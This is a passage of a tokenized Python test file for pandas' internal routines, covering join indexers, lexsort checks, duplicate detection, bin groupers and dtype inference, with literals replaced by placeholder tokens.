bexp = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . left_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_left_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . left_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . 
array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_outer_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . outer_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_inner_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . inner_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , dtype = np . 
int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_is_lexsorted ( ) : <EOL> failure = [ <EOL> np . array ( [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> 
, <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) , <EOL> np . array ( [ <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <EOL> <NUM_LIT:15> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT:12> , <NUM_LIT:11> , <EOL> <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <EOL> <NUM_LIT:9> , <NUM_LIT:8> , <EOL> <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <EOL> <NUM_LIT:6> , <NUM_LIT:5> , <EOL> <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] ) ] <EOL> assert ( not algos . is_lexsorted ( failure ) ) <EOL> def test_groupsort_indexer ( ) : <EOL> a = np . random . 
randint ( <NUM_LIT:0> , <NUM_LIT:1000> , <NUM_LIT:100> ) . astype ( np . int64 ) <EOL> b = np . random . randint ( <NUM_LIT:0> , <NUM_LIT:1000> , <NUM_LIT:100> ) . astype ( np . int64 ) <EOL> result = algos . groupsort_indexer ( a , <NUM_LIT:1000> ) [ <NUM_LIT:0> ] <EOL> expected = np . argsort ( a , kind = '<STR_LIT>' ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> key = a * <NUM_LIT:1000> + b <EOL> result = algos . groupsort_indexer ( key , <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> expected = np . lexsort ( ( b , a ) ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_ensure_platform_int ( ) : <EOL> arr = np . arange ( <NUM_LIT:100> ) <EOL> result = algos . ensure_platform_int ( arr ) <EOL> assert ( result is arr ) <EOL> def test_duplicated_with_nas ( ) : <EOL> keys = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , nan , <NUM_LIT:0> , <NUM_LIT:2> , nan ] , dtype = object ) <EOL> result = lib . duplicated ( keys ) <EOL> expected = [ False , False , False , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = [ False , False , False , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = [ True , False , True , False , False , False ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = False ) <EOL> expected = [ True , False , True , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> keys = np . empty ( <NUM_LIT:8> , dtype = object ) <EOL> for i , t in enumerate ( zip ( [ <NUM_LIT:0> , <NUM_LIT:0> , nan , nan ] * <NUM_LIT:2> , [ <NUM_LIT:0> , nan , <NUM_LIT:0> , nan ] * <NUM_LIT:2> ) ) : <EOL> keys [ i ] = t <EOL> result = lib . 
duplicated ( keys ) <EOL> falses = [ False ] * <NUM_LIT:4> <EOL> trues = [ True ] * <NUM_LIT:4> <EOL> expected = falses + trues <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = trues + falses <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = False ) <EOL> expected = trues + trues <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_maybe_booleans_to_slice ( ) : <EOL> arr = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = np . uint8 ) <EOL> result = lib . maybe_booleans_to_slice ( arr ) <EOL> assert ( result . dtype == np . bool_ ) <EOL> result = lib . maybe_booleans_to_slice ( arr [ : <NUM_LIT:0> ] ) <EOL> assert ( result == slice ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def test_convert_objects ( ) : <EOL> arr = np . array ( [ '<STR_LIT:a>' , '<STR_LIT:b>' , nan , nan , '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( result . dtype == np . object_ ) <EOL> def test_convert_infs ( ) : <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False ) <EOL> assert ( result . dtype == np . float64 ) <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False ) <EOL> assert ( result . dtype == np . float64 ) <EOL> def test_scientific_no_exponent ( ) : <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False , True ) <EOL> assert np . all ( np . 
isnan ( result ) ) <EOL> def test_convert_objects_ints ( ) : <EOL> dtypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for dtype_str in dtypes : <EOL> arr = np . array ( list ( np . arange ( <NUM_LIT:20> , dtype = dtype_str ) ) , dtype = '<STR_LIT:O>' ) <EOL> assert ( arr [ <NUM_LIT:0> ] . dtype == np . dtype ( dtype_str ) ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( issubclass ( result . dtype . type , np . integer ) ) <EOL> def test_convert_objects_complex_number ( ) : <EOL> for dtype in np . sctypes [ '<STR_LIT>' ] : <EOL> arr = np . array ( list ( <NUM_LIT> * np . arange ( <NUM_LIT:20> , dtype = dtype ) ) , dtype = '<STR_LIT:O>' ) <EOL> assert ( arr [ <NUM_LIT:0> ] . dtype == np . dtype ( dtype ) ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( issubclass ( result . dtype . type , np . complexfloating ) ) <EOL> def test_rank ( ) : <EOL> tm . _skip_if_no_scipy ( ) <EOL> from scipy . stats import rankdata <EOL> def _check ( arr ) : <EOL> mask = ~ np . isfinite ( arr ) <EOL> arr = arr . copy ( ) <EOL> result = algos . rank_1d_float64 ( arr ) <EOL> arr [ mask ] = np . inf <EOL> exp = rankdata ( arr ) <EOL> exp [ mask ] = nan <EOL> assert_almost_equal ( result , exp ) <EOL> _check ( np . array ( [ nan , nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , nan ] ) ) <EOL> _check ( np . array ( [ <NUM_LIT> , nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , nan ] ) ) <EOL> def test_get_reverse_indexer ( ) : <EOL> indexer = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> result = lib . get_reverse_indexer ( indexer , <NUM_LIT:5> ) <EOL> expected = np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:7> ] , dtype = np . 
int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_pad_backfill_object_segfault ( ) : <EOL> old = np . array ( [ ] , dtype = '<STR_LIT:O>' ) <EOL> new = np . array ( [ datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = algos . pad_object ( old , new ) <EOL> expected = np . array ( [ - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . pad_object ( new , old ) <EOL> expected = np . array ( [ ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . backfill_object ( old , new ) <EOL> expected = np . array ( [ - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . backfill_object ( new , old ) <EOL> expected = np . array ( [ ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_arrmap ( ) : <EOL> values = np . array ( [ '<STR_LIT:foo>' , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = algos . arrmap_object ( values , lambda x : x in [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> assert ( result . dtype == np . bool_ ) <EOL> def test_series_grouper ( ) : <EOL> from pandas import Series <EOL> obj = Series ( np . random . randn ( <NUM_LIT:10> ) ) <EOL> dummy = obj [ : <NUM_LIT:0> ] <EOL> labels = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> grouper = lib . SeriesGrouper ( obj , np . mean , labels , <NUM_LIT:2> , dummy ) <EOL> result , counts = grouper . get_result ( ) <EOL> expected = np . array ( [ obj [ <NUM_LIT:3> : <NUM_LIT:6> ] . mean ( ) , obj [ <NUM_LIT:6> : ] . mean ( ) ] ) <EOL> assert_almost_equal ( result , expected ) <EOL> exp_counts = np . 
array ( [ <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( counts , exp_counts ) <EOL> def test_series_bin_grouper ( ) : <EOL> from pandas import Series <EOL> obj = Series ( np . random . randn ( <NUM_LIT:10> ) ) <EOL> dummy = obj [ : <NUM_LIT:0> ] <EOL> bins = np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] ) <EOL> grouper = lib . SeriesBinGrouper ( obj , np . mean , bins , dummy ) <EOL> result , counts = grouper . get_result ( ) <EOL> expected = np . array ( [ obj [ : <NUM_LIT:3> ] . mean ( ) , obj [ <NUM_LIT:3> : <NUM_LIT:6> ] . mean ( ) , obj [ <NUM_LIT:6> : ] . mean ( ) ] ) <EOL> assert_almost_equal ( result , expected ) <EOL> exp_counts = np . array ( [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( counts , exp_counts ) <EOL> class TestBinGroupers ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def setUp ( self ) : <EOL> self . obj = np . random . randn ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . labels = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> self . bins = np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> def test_generate_bins ( self ) : <EOL> from pandas . core . groupby import generate_bins_generic <EOL> values = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> binner = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> for func in [ lib . generate_bins_dt64 , generate_bins_generic ] : <EOL> bins = func ( values , binner , closed = '<STR_LIT:left>' ) <EOL> assert ( ( bins == np . array ( [ <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> bins = func ( values , binner , closed = '<STR_LIT:right>' ) <EOL> assert ( ( bins == np . 
array ( [ <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> for func in [ lib . generate_bins_dt64 , generate_bins_generic ] : <EOL> values = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> binner = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> bins = func ( values , binner , closed = '<STR_LIT:right>' ) <EOL> assert ( ( bins == np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ ] , <EOL> '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values [ : <NUM_LIT:0> ] , <EOL> binner , '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ <NUM_LIT:4> ] , <EOL> '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ - <NUM_LIT:3> , - <NUM_LIT:1> ] , <EOL> '<STR_LIT:right>' ) <EOL> def test_group_ohlc ( ) : <EOL> def _check ( dtype ) : <EOL> obj = np . array ( np . random . randn ( <NUM_LIT:20> ) , dtype = dtype ) <EOL> bins = np . array ( [ <NUM_LIT:6> , <NUM_LIT:12> , <NUM_LIT:20> ] ) <EOL> out = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> ) , dtype ) <EOL> counts = np . zeros ( len ( out ) , dtype = np . int64 ) <EOL> labels = com . _ensure_int64 ( np . repeat ( <EOL> np . arange ( <NUM_LIT:3> ) , np . diff ( np . r_ [ <NUM_LIT:0> , bins ] ) ) ) <EOL> func = getattr ( algos , '<STR_LIT>' % dtype ) <EOL> func ( out , counts , obj [ : , None ] , labels ) <EOL> def _ohlc ( group ) : <EOL> if isnull ( group ) . all ( ) : <EOL> return np . repeat ( nan , <NUM_LIT:4> ) <EOL> return [ group [ <NUM_LIT:0> ] , group . max ( ) , group . min ( ) , group [ - <NUM_LIT:1> ] ] <EOL> expected = np . 
array ( [ _ohlc ( obj [ : <NUM_LIT:6> ] ) , _ohlc ( obj [ <NUM_LIT:6> : <NUM_LIT:12> ] ) , _ohlc ( obj [ <NUM_LIT:12> : ] ) <EOL> ] ) <EOL> assert_almost_equal ( out , expected ) <EOL> assert_almost_equal ( counts , [ <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:8> ] ) <EOL> obj [ : <NUM_LIT:6> ] = nan <EOL> func ( out , counts , obj [ : , None ] , labels ) <EOL> expected [ <NUM_LIT:0> ] = nan <EOL> assert_almost_equal ( out , expected ) <EOL> _check ( '<STR_LIT>' ) <EOL> _check ( '<STR_LIT>' ) <EOL> def test_try_parse_dates ( ) : <EOL> from dateutil . parser import parse <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = object ) <EOL> result = lib . try_parse_dates ( arr , dayfirst = True ) <EOL> expected = [ parse ( d , dayfirst = True ) for d in arr ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> class TestTypeInference ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def test_length_zero ( self ) : <EOL> result = lib . infer_dtype ( np . array ( [ ] , dtype = '<STR_LIT>' ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( [ ] ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_integers ( self ) : <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . int64 ( <NUM_LIT:4> ) , np . int32 ( <NUM_LIT:5> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . int64 ( <NUM_LIT:4> ) , np . int32 ( <NUM_LIT:5> ) , '<STR_LIT:foo>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_bools ( self ) : <EOL> arr = np . 
array ( [ True , False , True , True , True ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ np . bool_ ( True ) , np . bool_ ( False ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ True , False , True , '<STR_LIT:foo>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ True , False , True ] , dtype = bool ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_floats ( self ) : <EOL> arr = np . array ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , np . float64 ( <NUM_LIT:4> ) , np . float32 ( <NUM_LIT:5> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . float64 ( <NUM_LIT:4> ) , np . float32 ( <NUM_LIT:5> ) , '<STR_LIT:foo>' ] , <EOL> dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_string ( self ) : <EOL> pass <EOL> def test_unicode ( self ) : <EOL> pass <EOL> def test_datetime ( self ) : <EOL> dates = [ datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , x ) for x in range ( <NUM_LIT:1> , <NUM_LIT:20> ) ] <EOL> index = Index ( dates ) <EOL> self . assertEqual ( index . 
inferred_type , '<STR_LIT>' ) <EOL> def test_date ( self ) : <EOL> dates = [ datetime . date ( <NUM_LIT> , <NUM_LIT:1> , x ) for x in range ( <NUM_LIT:1> , <NUM_LIT:20> ) ] <EOL> index = Index ( dates ) <EOL> self . assertEqual ( index . inferred_type , '<STR_LIT:date>' ) <EOL> def test_to_object_array_tuples ( self ) : <EOL> r = ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> values = [ r ] <EOL> result = lib . to_object_array_tuples ( values ) <EOL> try : <EOL> from collections import namedtuple <EOL> record = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> r = record ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> values = [ r ] <EOL> result = lib . to_object_array_tuples ( values ) <EOL> except ImportError : <EOL> pass <EOL> def test_object ( self ) : <EOL> arr = np . array ( [ None ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_categorical ( self ) : <EOL> from pandas import Categorical , Series <EOL> arr = Categorical ( list ( '<STR_LIT:abc>' ) ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , 